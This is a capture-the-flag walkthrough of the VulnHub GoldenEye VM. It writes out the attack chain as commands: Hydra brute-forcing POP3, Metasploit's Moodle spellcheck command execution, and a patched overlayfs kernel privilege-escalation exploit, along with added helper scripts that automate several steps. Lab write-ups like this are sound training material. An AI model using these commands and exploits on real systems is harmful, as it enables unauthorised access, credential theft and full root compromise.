Welcome to another boot2root CTF challenge, GoldenEye, uploaded by Creosote on VulnHub. The VM follows a theme, and you need to snag the flag to complete the challenge. You can download it from: https://www.vulnhub.com/entry/goldeneye-1,240/
This lab was confusing even to begin with, because the author gives very little description, but it needs a good variety of techniques to get root (no exploit development or buffer overflows). So, on the basis of our experience and knowledge, we worked through the lab as follows.
Level: Intermediate
Penetration methodology:
§ Network scanning (Nmap)
§ Surfing HTTP web services
§ Fetching the encoded password
§ Decoding it (Burp Suite)
§ Brute-force (Hydra)
§ Connecting to POP3 (Netcat)
§ Extracting passwords from mail
§ Adding the domain name to /etc/hosts
§ Exploring the domain name in the browser
§ Brute-force (Hydra)
§ Logging in to the server
§ Exploiting Moodle (Metasploit)
§ Kernel exploit for privilege escalation (overlayfs)
§ Capturing the flag
Let's start.
First and foremost we scan the target with nmap. In my case the IP address was 192.168.1.140. The full-port scan (-p-) matters here: it is what reveals the non-standard ports used later.
nmap -p- -A 192.168.1.140 --open
Since port 80 was open, I explored the target IP in a web browser. The page gave a little hint about a login page at /sev-home/, as you can see in the image.
The page source loaded terminal.js, and a comment inside that script gave away two usernames (Boris, Natalya) and a password written as HTML character entities, as shown in the image below.
We copied the encoded text into Burp's Decoder, chose HTML decoding, and obtained the plaintext password InvincibleHack3r.
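The same HTML-entity decoding can be done from the terminal. The script below is an added example for this walkthrough, not code from the original post: a small awk-based decoder for numeric character references (&#NN; and &#xHH;). The sample inputs are constructed to look like the comment found in terminal.js; they are not the file itself.

```shell
#!/bin/sh
# Added example (not the walkthrough author's code): decode numeric HTML
# character references (&#NN; decimal and &#xHH; hex) back into plain text.
# Usage: printf '%s' "$encoded" | html_entity_decode
html_entity_decode() {
    awk '
    # hex2dec: hex digit string -> number, without gawk-only strtonum()
    function hex2dec(h,    i, d) {
        d = 0
        for (i = 1; i <= length(h); i++)
            d = d * 16 + index("0123456789abcdef", tolower(substr(h, i, 1))) - 1
        return d
    }
    {
        line = $0
        out = ""
        # consume references left to right; everything else is copied through
        while (match(line, /&#[0-9]+;|&#[xX][0-9a-fA-F]+;/)) {
            ref = substr(line, RSTART + 2, RLENGTH - 3)      # strip "&#" and ";"
            if (ref ~ /^[xX]/) code = hex2dec(substr(ref, 2))
            else               code = ref + 0
            out = out substr(line, 1, RSTART - 1) sprintf("%c", code)
            line = substr(line, RSTART + RLENGTH)
        }
        print out line
    }'
}

# Constructed sample: "InvincibleHack3r" as decimal references, in the style
# of the terminal.js comment (this is not the real file contents).
SAMPLE_ENCODED='&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;'

# Second constructed sample: hex references mixed with literal characters.
SAMPLE_MIXED='pass: &#x49;nvincible&#72;ack&#x33;r'

decode_sample() { printf '%s' "$1" | html_entity_decode; }

decode_sample "$SAMPLE_ENCODED"   # InvincibleHack3r
decode_sample "$SAMPLE_MIXED"     # pass: InvincibleHack3r
```

The hex branch is there because obfuscated JavaScript often mixes &#x49; style references with decimal ones; a decoder that only handles one form silently leaves part of the secret encoded.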
Following the earlier hint, we browsed to http://192.168.1.140/sev-home/, logged in with the credentials we had just recovered, and got a clue that the box runs a POP3 mail service, as shown in the image.
Now that we had two usernames, we brute-forced the POP3 service (on the non-standard port 55007 found by nmap) for each user with the following commands:
hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 192.168.1.140 -s 55007 pop3
We got the password secret1 for username boris, as shown in the image.
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -f 192.168.1.140 -s 55007 pop3
We got the password bird for username natalya, as shown in the image.
Using netcat we connected to the POP3 service and logged in as boris with the password secret1:
nc 192.168.1.140 55007
Boris's mailbox held three messages. Reading all of them, the clues were of no use; they are there only to confuse you, and they wasted our time trying to make something of them.
In the same way we logged in with username natalya and password bird. This gave us two messages, as shown in the image.
After opening both messages we found real clues: a username and password, a domain name, and a directory on that domain.
Username: xenia
Password: RCP90rulez!
Domain name: severnaya-station.com
Server directory: /gnocertdir
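Typing USER, PASS and RETR into nc by hand works, but it is easy to script. The following is an added example for this walkthrough, not code from the original post: it emits the client side of a plain RFC 1939 POP3 session, parses the message count out of a captured STAT reply, and pipes the dialogue through nc. The host, port and credentials are the ones from this lab; the server replies shown in the comments are the standard ones and are assumed, not copied from the VM.

```shell
#!/bin/sh
# Added example (not the walkthrough author's code): script the POP3
# dialogue on port 55007 instead of typing it into nc. Assumes plain POP3
# without TLS, as on this VM.

# pop3_commands USER PASS N: emit the client side of a session that logs in,
# asks for the mailbox size, lists and fetches messages 1..N, and logs out.
# Typical server side, one reply per command:
#   USER natalya -> +OK
#   PASS bird    -> +OK Logged in.
#   STAT         -> +OK <count> <octets>
#   LIST         -> +OK ... then "<n> <size>" per message, terminated by "."
#   RETR n       -> +OK ... headers, blank line, body, terminated by "."
#   QUIT         -> +OK
pop3_commands() {
    user=$1; pass=$2; count=$3
    printf 'USER %s\n' "$user"
    printf 'PASS %s\n' "$pass"
    printf 'STAT\n'
    printf 'LIST\n'
    i=1
    while [ "$i" -le "$count" ]; do
        printf 'RETR %s\n' "$i"
        i=$((i + 1))
    done
    printf 'QUIT\n'
}

# pop3_stat_count: read a server transcript on stdin and print the message
# count from the STAT reply ("+OK <count> <octets>"); prints nothing if absent.
# The greeting and "+OK Logged in." do not match because their second word
# is not a number.
pop3_stat_count() {
    sed -n 's/^+OK \([0-9][0-9]*\) [0-9][0-9]*.*/\1/p' | head -n 1
}

# pop3_dump HOST PORT USER PASS N: run the dialogue through nc. POP3 lines end
# in CRLF, so the line ending is added here. The sleep lets the server answer
# (and send its greeting) before the next command arrives; without it nc may
# push the whole script before the banner has been read.
pop3_dump() {
    host=$1; port=$2; user=$3; pass=$4; count=$5
    pop3_commands "$user" "$pass" "$count" | while IFS= read -r line; do
        sleep 1
        printf '%s\r\n' "$line"
    done | nc "$host" "$port"
}

# Live usage against the lab (not run here):
#   pop3_dump 192.168.1.140 55007 natalya bird 2
```

Run it once with a generous N, read the count out of the STAT reply with pop3_stat_count, and then you know exactly how many RETR commands the mailbox needs.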
From this point we added the server's IP address together with the domain name to the /etc/hosts file on our Linux box, so that the name resolves to 192.168.1.140.
Next we browsed to the /gnocertdir directory on that domain:
http://severnaya-station.com/gnocertdir
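A hosts entry added with a plain echo >> /etc/hosts piles up duplicates (and stale IPs from earlier labs) every time the VM comes back with a new address. The function below is an added example for this walkthrough, not code from the original post: it replaces any existing mapping for the name and appends a fresh one, and takes the file as a parameter so it can be tried on a scratch copy first. The IP and domain are the ones from this lab.

```shell
#!/bin/sh
# Added example (not the walkthrough author's code): idempotent hosts entry.
# Usage: add_host_entry /etc/hosts 192.168.1.140 severnaya-station.com

# add_host_entry FILE IP NAME: remove any non-comment line that already maps
# NAME (to any IP), then append "IP<TAB>NAME". Writing back with cat keeps the
# original file's owner and mode, which mv over a temp file would not.
add_host_entry() {
    file=$1; ip=$2; name=$3
    tmp="$file.tmp.$$"
    if [ -f "$file" ]; then
        grep -v -E "^[^#]*[[:space:]]$name([[:space:]]|\$)" "$file" > "$tmp" || true
    else
        : > "$tmp"
    fi
    printf '%s\t%s\n' "$ip" "$name" >> "$tmp"
    cat "$tmp" > "$file" && rm -f "$tmp"
}

# host_entry_count FILE NAME: number of non-comment lines mapping NAME
# (should be exactly 1 after add_host_entry).
host_entry_count() {
    grep -c -E "^[^#]*[[:space:]]$2([[:space:]]|\$)" "$1" || true
}

# Try it on a scratch copy; calling it twice must not duplicate the entry.
scratch=$(mktemp)
printf '127.0.0.1\tlocalhost\n' > "$scratch"
add_host_entry "$scratch" 192.168.1.140 severnaya-station.com
add_host_entry "$scratch" 192.168.1.140 severnaya-station.com
host_entry_count "$scratch" severnaya-station.com    # 1
rm -f "$scratch"
```

After touching the real file, confirm resolution with getent hosts severnaya-station.com before blaming the web server for a failed request.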
This is a Moodle site. After logging in as xenia with the password from the mail, we explored the tabs on the page; inside the message box we opened a recent conversation between Xenia and Doak (another new user).
Then we used hydra again to fetch doak's POP3 password with the following command:
hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f 192.168.1.140 -s 55007 pop3
We got the password goat for username doak, as shown in the image.
Using netcat we logged in to POP3 with username doak and password goat. This gave us one message, and on reading it we acquired another username and password.
Username: dr_doak
Password: 4England!
Logging in to the Moodle site with the acquired username dr_doak and password 4England!, as shown in the image, we explored all the tabs in the navigation section and found a file s3cret.txt in the user's private files. It pointed us to an image, which we downloaded and examined with strings; among the printable strings was a base64-encoded value, which we decoded:
wget http://severnaya-station.com/dir007key/for-007.jpg
strings for-007.jpg
echo '<base64 text>' | base64 -d
This gave xWinter1995x! in plain text, which looked like it could be a password.
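Scrolling through strings output for a base64 blob is error-prone on a larger file. The script below is an added example for this walkthrough, not code from the original post: it extracts printable runs from a binary (using tr, so it also works where binutils' strings is missing), keeps only runs that look like base64, and prints the ones that decode to readable text. The sample "image" is a constructed file that merely stands in for for-007.jpg; the embedded token is the base64 form of the password found above.

```shell
#!/bin/sh
# Added example (not the walkthrough author's code): find and decode
# base64-looking strings inside a binary such as for-007.jpg.
# Usage: extract_base64_strings for-007.jpg

# printable_runs FILE: like strings(1), built from tr so it needs no binutils;
# every non-printable byte becomes a line break.
printable_runs() {
    LC_ALL=C tr -c '[:print:]' '\n' < "$1"
}

# extract_base64_strings FILE: print "<candidate><TAB><decoded>" for every run
# of 16+ base64 characters whose length is a multiple of 4 and which decodes
# to printable ASCII. Runs that decode to binary junk are skipped.
extract_base64_strings() {
    printable_runs "$1" | LC_ALL=C grep -oE '[A-Za-z0-9+/]{16,}={0,2}' |
    while IFS= read -r cand; do
        [ $(( ${#cand} % 4 )) -eq 0 ] || continue
        decoded=$(printf '%s' "$cand" | base64 -d 2>/dev/null) || continue
        # reject decodings containing control or high bytes
        if printf '%s' "$decoded" | LC_ALL=C grep -q '[^[:print:]]'; then
            continue
        fi
        printf '%s\t%s\n' "$cand" "$decoded"
    done
}

# make_sample_image FILE: constructed stand-in for the JPEG (not the real
# file): header-like bytes, binary noise, a non-base64 string and one token.
make_sample_image() {
    printf 'JFIF\377\330\377\340\000\020 Exif junk \001\002 eFdpbnRlcjE5OTV4IQ== \377\331 Created-With-GIMP\n' > "$1"
}

sample=$(mktemp)
make_sample_image "$sample"
extract_base64_strings "$sample"    # eFdpbnRlcjE5OTV4IQ==<TAB>xWinter1995x!
rm -f "$sample"
```

The printable check is the important filter: a long run of base64 characters appears in almost any compressed file, and most of them decode to noise. Only candidates that decode cleanly to text are worth trying as passwords.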
Searching for Moodle exploits, we found exploit 29324, the TinyMCE spell-checker command execution that Metasploit ships as moodle_cmd_exec. Its description showed that the attack needs an authenticated user and that the spell engine selected for TinyMCE must be PSpellShell, as shown in the image. We had also spotted a new username, admin, so we tried admin with the password we had just decoded, changed the spell engine to PSpellShell and saved the change. The Metasploit module's description explains the bug:
Moodle allows an authenticated user to define spellcheck
settings via the web interface. The user can update the spellcheck mechanism to
point to a system-installed aspell binary. By updating the path for the
spellchecker to an arbitrary command, an attacker can run arbitrary commands in
the context of the web application upon spellchecking requests. This module
also allows an attacker to leverage another privilege escalation vuln.
use exploit/multi/http/moodle_cmd_exec
msf exploit(moodle_cmd_exec) > set rhost severnaya-station.com
msf exploit(moodle_cmd_exec) > set targeturi /gnocertdir
msf exploit(moodle_cmd_exec) > set username admin
msf exploit(moodle_cmd_exec) > set password xWinter1995x!
Boom!!! We successfully got command shell session 1.
As we love meterpreter, I upgraded it to a meterpreter shell:
sessions -u 1
Then with the help of sysinfo we enumerated the kernel. Here we focused on the Linux version, 3.13; if you search for it you will find the following local privilege escalation:
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
So we searched the local exploit database in Kali for that kernel version and found it as exploit 37292:
searchsploit linux 3.13
Then with the help of gcc we compiled it as 'shell' inside the /root directory and uploaded the compiled binary to the victim machine via meterpreter. Then we used the Python one-liner to get a proper terminal and ran the following commands:
python -c 'import pty;pty.spawn("/bin/bash")'
chmod 777 shell
./shell
Unfortunately!! This failed with the error 'gcc: not found'. The error comes from the target, not from our build: the exploit writes a small shared-library source to /tmp and compiles it there at runtime by calling gcc, and GoldenEye has cc but no gcc. So we edited the original file, 37292.c, and replaced gcc with cc in that call, as shown in the image, then compiled it again (on the attacking box either compiler works):
cc 37292.c -o raj
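The "gcc: not found" detour can be automated: pick whichever compiler exists, and rewrite the compiler name inside the exploit's own runtime compile call before building. The script below is an added example for this walkthrough, not code from the original post or from the exploit's author. It assumes the runtime compile command appears in the source as a string literal beginning with "gcc " (check with grep '"gcc ' 37292.c before relying on it); the sample source it patches is a constructed stand-in, not the real exploit.

```shell
#!/bin/sh
# Added example (not the walkthrough author's code): prepare a kernel exploit
# for a target that has cc but no gcc.

# pick_cc NAME...: print the first compiler name found in PATH, else fail.
pick_cc() {
    for c in "$@"; do
        if command -v "$c" >/dev/null 2>&1; then
            printf '%s\n' "$c"
            return 0
        fi
    done
    return 1
}

# patch_runtime_compiler SRC NEWCC: replace "gcc ..." string literals (the
# exploit's runtime call to build its helper library on the target) with
# "NEWCC ...". Keeps an untouched copy as SRC.orig.
# Assumption: the literal starts with "gcc " exactly; verify with grep first.
patch_runtime_compiler() {
    src=$1; newcc=$2
    cp "$src" "$src.orig"
    sed "s|\"gcc |\"$newcc |g" "$src.orig" > "$src"
}

# count_runtime_gcc SRC: how many "gcc " literals remain (0 after patching).
count_runtime_gcc() {
    grep -c '"gcc ' "$1" || true
}

# build_exploit SRC OUT: compile with whatever is available on this box.
build_exploit() {
    cc_bin=$(pick_cc gcc cc clang) || { echo "no C compiler in PATH" >&2; return 1; }
    "$cc_bin" "$1" -o "$2"
}

# make_sample_source FILE: constructed stand-in for the one line that matters
# in the exploit; this is NOT 37292.c.
make_sample_source() {
    printf '%s\n' '#include <stdlib.h>' 'int main(void) {' \
        '    return system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");' \
        '}' > "$1"
}

demo=$(mktemp)
make_sample_source "$demo"
patch_runtime_compiler "$demo" cc
count_runtime_gcc "$demo"     # 0
rm -f "$demo" "$demo.orig"

# Real usage on the attacking box (not run here):
#   patch_runtime_compiler 37292.c cc && build_exploit 37292.c raj
```

The point to remember is that there are two compilations: yours, on the attacker, and the exploit's own, on the target. Fixing only the first one is why the first attempt failed.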
Then we uploaded the new binary to the victim, gave it full permissions and ran it, this time without any error message:
upload /root/raj
chmod 777 raj
./raj
Yuppiee!! We got root access successfully!!
Now let's finish the task by capturing flag.txt from inside the /root directory.